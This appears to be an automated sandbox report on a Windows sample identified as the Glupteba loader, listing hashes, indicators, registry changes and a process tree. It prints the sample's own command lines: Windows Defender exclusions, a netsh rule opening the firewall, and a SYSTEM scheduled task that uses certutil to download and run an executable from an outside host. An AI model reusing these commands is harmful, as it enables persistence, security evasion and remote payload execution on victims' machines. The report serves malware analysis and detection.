General
Target

bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe

Filesize

3MB

Completed

20-05-2022 22:25

Task

behavioral1

Score
10/10
MD5

7da8b9fc5c5a67a06afc0749473f1b6e

SHA1

7b0c1138015a3a573469e1142e44be65b73979c5

SHA256

bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7

SHA256

5b9a364aa7cdf6340e709afb5a60eabd045ace1eaeefaa23fd89ede50bd0a51329d69a4afd49ca270ebb80014882ef7728cf72a362a1d0a63d01ba66fa244df7

Malware Config
Signatures 16

Filter: none

Defense Evasion
Discovery
Persistence
  • Glupteba

    Description

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload

    Reported IOCs

    resourceyara_rule
    behavioral1/memory/1448-56-0x00000000053B0000-0x0000000005AA6000-memory.dmpfamily_glupteba
    behavioral1/memory/1448-57-0x0000000000400000-0x00000000036C8000-memory.dmpfamily_glupteba
    behavioral1/memory/1388-63-0x0000000000400000-0x00000000036C8000-memory.dmpfamily_glupteba
    behavioral1/memory/868-70-0x0000000000400000-0x00000000036C8000-memory.dmpfamily_glupteba
  • Windows security bypass

    TTPs

    Disabling Security ToolsModify Registry
  • Executes dropped EXE
    csrss.exepatch.exe

    Reported IOCs

    pidprocess
    868csrss.exe
    1008patch.exe
    1276
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Loads dropped DLL
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exepatch.exe

    Reported IOCs

    pidprocess
    1388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    1388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    880
    1008patch.exe
    1008patch.exe
    1008patch.exe
    1008patch.exe
    1008patch.exe
    1276
    1008patch.exe
    1008patch.exe
    1008patch.exe
  • Windows security modification
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe

    TTPs

    Disabling Security ToolsModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d26671056783.exe = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\d26671056783 = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\WanderingSun = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Adds Run key to start application
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\WanderingSun = "\"C:\\Windows\\rss\\csrss.exe\""bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Modifies boot configuration data using bcdedit
    bcdedit.exe

    Reported IOCs

    pidprocess
    1292bcdedit.exe
  • Drops file in Windows directory
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exemakecab.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Windows\rss\csrss.exebf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    File createdC:\Windows\Logs\CBS\CbsPersist_20220521002317.cabmakecab.exe
    File opened for modificationC:\Windows\rssbf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Creates scheduled task(s)
    schtasks.exeschtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    1504schtasks.exe
    572schtasks.exe
  • Modifies data under HKEY_USERS
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exenetsh.exe

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"netsh.exe
    Key created\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTracenetsh.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Suspicious behavior: EnumeratesProcesses
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exebf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe

    Reported IOCs

    pidprocess
    1448bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    1388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
  • Suspicious use of AdjustPrivilegeToken
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execsrss.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1448bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Token: SeImpersonatePrivilege1448bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    Token: SeSystemEnvironmentPrivilege868csrss.exe
  • Suspicious use of WriteProcessMemory
    bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execmd.execsrss.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1388 wrote to memory of 16521388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execmd.exe
    PID 1388 wrote to memory of 16521388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execmd.exe
    PID 1388 wrote to memory of 16521388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execmd.exe
    PID 1388 wrote to memory of 16521388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execmd.exe
    PID 1652 wrote to memory of 18561652cmd.exenetsh.exe
    PID 1652 wrote to memory of 18561652cmd.exenetsh.exe
    PID 1652 wrote to memory of 18561652cmd.exenetsh.exe
    PID 1388 wrote to memory of 8681388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execsrss.exe
    PID 1388 wrote to memory of 8681388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execsrss.exe
    PID 1388 wrote to memory of 8681388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execsrss.exe
    PID 1388 wrote to memory of 8681388bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.execsrss.exe
    PID 868 wrote to memory of 1292868csrss.exebcdedit.exe
    PID 868 wrote to memory of 1292868csrss.exebcdedit.exe
    PID 868 wrote to memory of 1292868csrss.exebcdedit.exe
    PID 868 wrote to memory of 1292868csrss.exebcdedit.exe
Processes 10
  • C:\Users\Admin\AppData\Local\Temp\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
    "C:\Users\Admin\AppData\Local\Temp\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe"
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    PID:1448
    • C:\Users\Admin\AppData\Local\Temp\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe
      "C:\Users\Admin\AppData\Local\Temp\bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7.exe"
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes"
        Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes
          Modifies data under HKEY_USERS
          PID:1856
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:868
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          Creates scheduled task(s)
          PID:572
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          Creates scheduled task(s)
          PID:1504
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          Executes dropped EXE
          Loads dropped DLL
          PID:1008
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          Modifies boot configuration data using bcdedit
          PID:1292
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220521002317.log C:\Windows\Logs\CBS\CbsPersist_20220521002317.cab
    Drops file in Windows directory
    PID:268
Network
MITRE ATT&CK Matrix
Collection
